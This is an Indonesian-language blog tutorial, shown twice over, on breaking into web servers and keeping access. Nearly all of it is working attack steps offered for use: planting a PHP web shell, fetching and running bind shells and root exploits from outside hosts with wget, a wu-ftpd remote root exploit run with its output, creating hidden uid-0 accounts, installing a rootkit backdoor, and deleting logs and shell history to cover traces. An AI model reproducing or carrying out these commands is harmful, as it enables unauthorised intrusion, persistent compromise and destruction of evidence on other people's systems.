Pasang Backdoor
§ZiRt§
Assalamu'alaikum.
Pada postingan kali ini ane akan membahas mengenai cara pasang backdoor,kagak usah basa basi langsung saja simak dimari ^_^
-*-------------------*-
-*- pasang backd00R -*-
-*-------------------*-
=====================
install shell php
=====================
###contohnya
http://livron.port5.com/mail.php <---------ini source shell
misalnya:
http://www.moonshade.com/modules/My_eGal...m/mail.php -O log.php
bila keluar pesan "permission denied" cari lah folder lain yang bisa untuk wget shell.php kita
kalo bisa... buka:
http://www.target.org/modules/My_eGaller...ic/log.php
==============
pasang bindtty
==============
###http://student.te.ugm.ac.id/~phoenix03/audit/bindedit.c
gcc -o /var/tmp/bind /var/tmp/bind.c;/var/tmp/bind 4000
diatas kita menggunakan port 4000 sebagai binding port, sekarang cek apakah port
4000 terbuka, scan dengan phnxscan.c yang dibuat penulis, anda dapat mendownload
source kodenya di http://student.te.ugm.ac.id/~phoenix03/t...hnxscan.c. Kompile
dan ekskusi script tadi menggunakan gcc dan scanlah port 4000 servet http://www.target.com.
myshell~>gcc -o phnxscan phnxscan.c
myshell~> ping -c 2 target.com
PING target.com (210.189.77.28): 56 data bytes
64 bytes from 210.189.77.28: icmp_seq=0 ttl=38 time=428.044 ms
64 bytes from 210.189.77.28: icmp_seq=1 ttl=38 time=428.624 ms
--- target.com ping statistics ---
2 packets transmitted, 2 packets received, 0.0% packet loss
round-trip min/avg/max/std-dev = 428.044/428.334/428.624/0.290 ms
myshell~> phnxscan -p 4000 -s 210.189.77.28
port 4000 (tcp) terbuka
Telnet server target port 4000, jika berhasil maka anda akan disuruh memasukkan
password yang default dari scriptnya changeme
myshell~> telnet 210.189.77.28 4000
Trying 210.189.77.28...
Connected to target.com (210.189.77.28).
Escape character is '^]'.
---------------------------------------------------
#### cd /var/tmp ; wget http://www.geocities.com/lifron/bindtty -O /tmp/httpd ini biar hasil wgetnya di taro di folder /tmp dg nama file httpd
baru bikin file exekusi
chmod 755 /tmp/httpd
----------------------------------------------------
#### cd /var/tmp ; wget http://www.renjana.ws/~toa/bindtty
cd /var/tmp ; chmod 755 bindtty
cd /var/tmp ; ./bindtty
----------------------------------------------------
# test pake `uname -a` < kernel 2.4.20 ke bawah yg bisa
wget http://roseofworld.org/shell.tar
tar -zxvf shell.tar; cd webshell; ./1980
# klo uda buka putty > masukkan host > pilih telnet > isi port: 1980
# klo sukses maka akan masuk shell
### pake bind yg laen jika pengen shellnya ada passwd-nya
cd /var/tmp; wget geocities.com/pothei/nmap;chmod 755 nmap; ./nmap
# telnet ke host port 6665 passwd `stimik`
## cd /tmp; wget http://geocities.com/g4ptek/tools/bind.tgz
tar -zxvf bind.tgz;cd .bind; chmod 755 bindtty; ./dssl bindtty
telnet ke host port 6665 passwd `gagal`
## cd /var/tmp; wget http://geocities.com/g4ptek/tools/dns.php
# chmod 755 dns; ./dns
# telnet http://www.target.com 6029
-*-------------------*-
-*- belajar NgeRoot -*-
-*-------------------*-
### tahap ngeroot di shell yg tadi kita tembus
mkdir /tmp/temp.log
cd /tmp/temp.log
wget http://roseofworld.org/root.tar.gz
tar -zxvf root.tar.gz
cd root
./loginx 1970 1970
# jika tidak mendapat pesan error maka kmu sukses, pointer $ akan brubah menjadi #
# cek dengan `id` jika root jgn lupa bagi2 shellnya
### atau bisa ambil exploit di http://www.malanghack.net/alat/
mkdir /tmp/temp.log;cd /tmp/temp.log
wget http://www.malanghack.net/alat/w00t
chmod 755 w00t
./w00t
# jika ga muncul pesan error: you got root man!!
+----------------------------------------------------------------------------------------+
-*-----------------*-
-*- Cracking Root -*-
-*-----------------*-
Tips:
mkdir .bash <--- untuk membuat direktori bash
cd .bash <--- untuk masuk ke direktori bash
mkdir <direktory> <--- untuk membuat direktory baru
cd <direktory> <--- untuk masuk ke direktory yg anda mau
cd / <--- untuk keluar dari suatu direktory
rm -rf <file> <--- untuk menghapus file/direktory
-*-----------------------------------------------*-
1. Tahap Pertama :
Cara instalasi Xpost dan ftp
wget http://cyberborneo.b0x.com/xpost.tgz
wget http://cyberborneo.b0x.com/ftp.tgz
tar -zxvf xpost.tgz
tar -zxvf http://ftp.tgz
-*------*-
2. Tahap Kedua
cd xpost
cd xwurm/
./scan 213.124
setelah dapat wu-scan.log
./masswu wu-scan.log
Setelah didapat pesan sebagai berikut
Trying get root 213.124.151.113 ...
SUCCESS, YOU HAVE ROOT IN 213.124.151.113 ...
Logged in log-root ...
Itu berarti anda telah dapat akses root di IP 213.124.151.113
-*------*-
3. Tahap Ketiga
Buka new sessiom dari putty ssh anda, login kembali ke shell anda
masuk ke direktory ftp anda
cd ftp
./awu 213.124.151.113 ( ip nya)
apabila anda sukses mendapat akses root nya maka akan keluar pesan sbb:
7350wurm - x86/linux wuftpd <= 2.6.1 remote root (version 0.2.2)
team teso (thx bnuts, tomas, synnergy.net !).
# trying to log into 213.124.151.113 with (ftp/mozilla@) ... connected.
# banner: 220 db-depot01 FTP server (Version wu-2.6.1-16) ready.
# successfully selected target from banner
### TARGET: RedHat 7.1 (Seawolf) [wu-ftpd-2.6.1-16.rpm]
# 1. filling memory gaps
# 2. sending bigbuf + fakechunk
building chunk: ([0x0807314c] = 0x08085f98) in 238 bytes
# 3. triggering free(globlist[1])
#
# exploitation succeeded. sending real shellcode
# sending setreuid/chroot/execve shellcode
# spawning shell
###################################################################
uid=0(root) gid=0(root) groups=50(ftp)
Linux db-depot01 2.4.2-2 #1 Sun Apr 8 20:41:30 EDT 2001 i686 unknown
whoami
root <-- berarti anda sedang dalam akses root
-*------*-
4. Tahap Keempat
Add login akses root anda
----------------------------------------------------------------
1. Cara I
(bukan utk redhat 7.2)
/usr/sbin/useradd rampok -u 0 -d /
passwd -d rampok
passwd rampok
su rampok <<--------untuk super user
2. Cara II
kalo mau dapet acces root ketik :
/usr/sbin/useradd crit -u 0 g- 0 -d /etc/crit
abis itu ketik lagi
passwd crit
wuasu666
Kemudian Add User untuk login shell anda
/usr/sbin/adduser html -g wheel -s /bin/bash -d /etc/html
passwd html
fuck666 2X
-*------*-
5. Tahap Kelima
Pasang backdor ke shell baru anda guna menjaga kemungkinan yg tidak di inginkan
wget http://www.utay-doyan.cc/shv4.tar.gz
tar -zxvf shv4.tar.gz
cd shv4
./setup pass yang dimau port yang dimau
contoh : --> ./setup wuasu 7000
cd /
wget http://cyberborneo.b0x.com/cleaner.tgz
tar -zxvf cleaner.tgz
cd cleaner
./install
Jangan lupa untuk menghapus file backdor anda tadi untuk menghapus jejak
rm -rf cleaner.tgz
rm -rf shv4.tar.gz
-*------*-
6. Tahap Keenam
Hapus jejak ngeroot anda ketik perintah berikut:
rm -f /.bash_history /root/.bash_history /var/log/messages
ln -s /devory
ln -s /dev/null /root/.bash_history
touch /var/log/messages
chmod 600 /var/log/messages
rm -rf /var/log/lastlog
cat > /var/log/lastlog
ctrl d
SELESAI.....
Sekian tutor pasang backdoor yang dapat ane sampaikan,apabila terdapat banyak kesalahan dalam penyusunan saya mohon maaf .
Terimakasih atas barata jaya atas bimbingannya .
Wassalamu'alaikum.
Assalamu'alaikum.
Pada postingan kali ini ane akan membahas mengenai cara pasang backdoor,kagak usah basa basi langsung saja simak dimari ^_^
-*-------------------*-
-*- pasang backd00R -*-
-*-------------------*-
=====================
install shell php
=====================
###contohnya
http://livron.port5.com/mail.php <---------ini source shell
misalnya:
http://www.moonshade.com/modules/My_eGal...m/mail.php -O log.php
bila keluar pesan "permission denied" cari lah folder lain yang bisa untuk wget shell.php kita
kalo bisa... buka:
http://www.target.org/modules/My_eGaller...ic/log.php
==============
pasang bindtty
==============
###http://student.te.ugm.ac.id/~phoenix03/audit/bindedit.c
gcc -o /var/tmp/bind /var/tmp/bind.c;/var/tmp/bind 4000
diatas kita menggunakan port 4000 sebagai binding port, sekarang cek apakah port
4000 terbuka, scan dengan phnxscan.c yang dibuat penulis, anda dapat mendownload
source kodenya di http://student.te.ugm.ac.id/~phoenix03/t...hnxscan.c. Kompile
dan ekskusi script tadi menggunakan gcc dan scanlah port 4000 servet http://www.target.com.
myshell~>gcc -o phnxscan phnxscan.c
myshell~> ping -c 2 target.com
PING target.com (210.189.77.28): 56 data bytes
64 bytes from 210.189.77.28: icmp_seq=0 ttl=38 time=428.044 ms
64 bytes from 210.189.77.28: icmp_seq=1 ttl=38 time=428.624 ms
--- target.com ping statistics ---
2 packets transmitted, 2 packets received, 0.0% packet loss
round-trip min/avg/max/std-dev = 428.044/428.334/428.624/0.290 ms
myshell~> phnxscan -p 4000 -s 210.189.77.28
port 4000 (tcp) terbuka
Telnet server target port 4000, jika berhasil maka anda akan disuruh memasukkan
password yang default dari scriptnya changeme
myshell~> telnet 210.189.77.28 4000
Trying 210.189.77.28...
Connected to target.com (210.189.77.28).
Escape character is '^]'.
---------------------------------------------------
#### cd /var/tmp ; wget http://www.geocities.com/lifron/bindtty -O /tmp/httpd ini biar hasil wgetnya di taro di folder /tmp dg nama file httpd
baru bikin file exekusi
chmod 755 /tmp/httpd
----------------------------------------------------
#### cd /var/tmp ; wget http://www.renjana.ws/~toa/bindtty
cd /var/tmp ; chmod 755 bindtty
cd /var/tmp ; ./bindtty
----------------------------------------------------
# test pake `uname -a` < kernel 2.4.20 ke bawah yg bisa
wget http://roseofworld.org/shell.tar
tar -zxvf shell.tar; cd webshell; ./1980
# klo uda buka putty > masukkan host > pilih telnet > isi port: 1980
# klo sukses maka akan masuk shell
### pake bind yg laen jika pengen shellnya ada passwd-nya
cd /var/tmp; wget geocities.com/pothei/nmap;chmod 755 nmap; ./nmap
# telnet ke host port 6665 passwd `stimik`
## cd /tmp; wget http://geocities.com/g4ptek/tools/bind.tgz
tar -zxvf bind.tgz;cd .bind; chmod 755 bindtty; ./dssl bindtty
telnet ke host port 6665 passwd `gagal`
## cd /var/tmp; wget http://geocities.com/g4ptek/tools/dns.php
# chmod 755 dns; ./dns
# telnet http://www.target.com 6029
-*-------------------*-
-*- belajar NgeRoot -*-
-*-------------------*-
### tahap ngeroot di shell yg tadi kita tembus
mkdir /tmp/temp.log
cd /tmp/temp.log
wget http://roseofworld.org/root.tar.gz
tar -zxvf root.tar.gz
cd root
./loginx 1970 1970
# jika tidak mendapat pesan error maka kmu sukses, pointer $ akan brubah menjadi #
# cek dengan `id` jika root jgn lupa bagi2 shellnya
### atau bisa ambil exploit di http://www.malanghack.net/alat/
mkdir /tmp/temp.log;cd /tmp/temp.log
wget http://www.malanghack.net/alat/w00t
chmod 755 w00t
./w00t
# jika ga muncul pesan error: you got root man!!
+----------------------------------------------------------------------------------------+
-*-----------------*-
-*- Cracking Root -*-
-*-----------------*-
Tips:
mkdir .bash <--- untuk membuat direktori bash
cd .bash <--- untuk masuk ke direktori bash
mkdir <direktory> <--- untuk membuat direktory baru
cd <direktory> <--- untuk masuk ke direktory yg anda mau
cd / <--- untuk keluar dari suatu direktory
rm -rf <file> <--- untuk menghapus file/direktory
-*-----------------------------------------------*-
1. Tahap Pertama :
Cara instalasi Xpost dan ftp
wget http://cyberborneo.b0x.com/xpost.tgz
wget http://cyberborneo.b0x.com/ftp.tgz
tar -zxvf xpost.tgz
tar -zxvf http://ftp.tgz
-*------*-
2. Tahap Kedua
cd xpost
cd xwurm/
./scan 213.124
setelah dapat wu-scan.log
./masswu wu-scan.log
Setelah didapat pesan sebagai berikut
Trying get root 213.124.151.113 ...
SUCCESS, YOU HAVE ROOT IN 213.124.151.113 ...
Logged in log-root ...
Itu berarti anda telah dapat akses root di IP 213.124.151.113
-*------*-
3. Tahap Ketiga
Buka new sessiom dari putty ssh anda, login kembali ke shell anda
masuk ke direktory ftp anda
cd ftp
./awu 213.124.151.113 ( ip nya)
apabila anda sukses mendapat akses root nya maka akan keluar pesan sbb:
7350wurm - x86/linux wuftpd <= 2.6.1 remote root (version 0.2.2)
team teso (thx bnuts, tomas, synnergy.net !).
# trying to log into 213.124.151.113 with (ftp/mozilla@) ... connected.
# banner: 220 db-depot01 FTP server (Version wu-2.6.1-16) ready.
# successfully selected target from banner
### TARGET: RedHat 7.1 (Seawolf) [wu-ftpd-2.6.1-16.rpm]
# 1. filling memory gaps
# 2. sending bigbuf + fakechunk
building chunk: ([0x0807314c] = 0x08085f98) in 238 bytes
# 3. triggering free(globlist[1])
#
# exploitation succeeded. sending real shellcode
# sending setreuid/chroot/execve shellcode
# spawning shell
###################################################################
uid=0(root) gid=0(root) groups=50(ftp)
Linux db-depot01 2.4.2-2 #1 Sun Apr 8 20:41:30 EDT 2001 i686 unknown
whoami
root <-- berarti anda sedang dalam akses root
-*------*-
4. Tahap Keempat
Add login akses root anda
----------------------------------------------------------------
1. Cara I
(bukan utk redhat 7.2)
/usr/sbin/useradd rampok -u 0 -d /
passwd -d rampok
passwd rampok
su rampok <<--------untuk super user
2. Cara II
kalo mau dapet acces root ketik :
/usr/sbin/useradd crit -u 0 g- 0 -d /etc/crit
abis itu ketik lagi
passwd crit
wuasu666
Kemudian Add User untuk login shell anda
/usr/sbin/adduser html -g wheel -s /bin/bash -d /etc/html
passwd html
fuck666 2X
-*------*-
5. Tahap Kelima
Pasang backdor ke shell baru anda guna menjaga kemungkinan yg tidak di inginkan
wget http://www.utay-doyan.cc/shv4.tar.gz
tar -zxvf shv4.tar.gz
cd shv4
./setup pass yang dimau port yang dimau
contoh : --> ./setup wuasu 7000
cd /
wget http://cyberborneo.b0x.com/cleaner.tgz
tar -zxvf cleaner.tgz
cd cleaner
./install
Jangan lupa untuk menghapus file backdor anda tadi untuk menghapus jejak
rm -rf cleaner.tgz
rm -rf shv4.tar.gz
-*------*-
6. Tahap Keenam
Hapus jejak ngeroot anda ketik perintah berikut:
rm -f /.bash_history /root/.bash_history /var/log/messages
ln -s /devory
ln -s /dev/null /root/.bash_history
touch /var/log/messages
chmod 600 /var/log/messages
rm -rf /var/log/lastlog
cat > /var/log/lastlog
ctrl d
SELESAI.....
Sekian tutor pasang backdoor yang dapat ane sampaikan,apabila terdapat banyak kesalahan dalam penyusunan saya mohon maaf .
Terimakasih atas barata jaya atas bimbingannya .
Wassalamu'alaikum.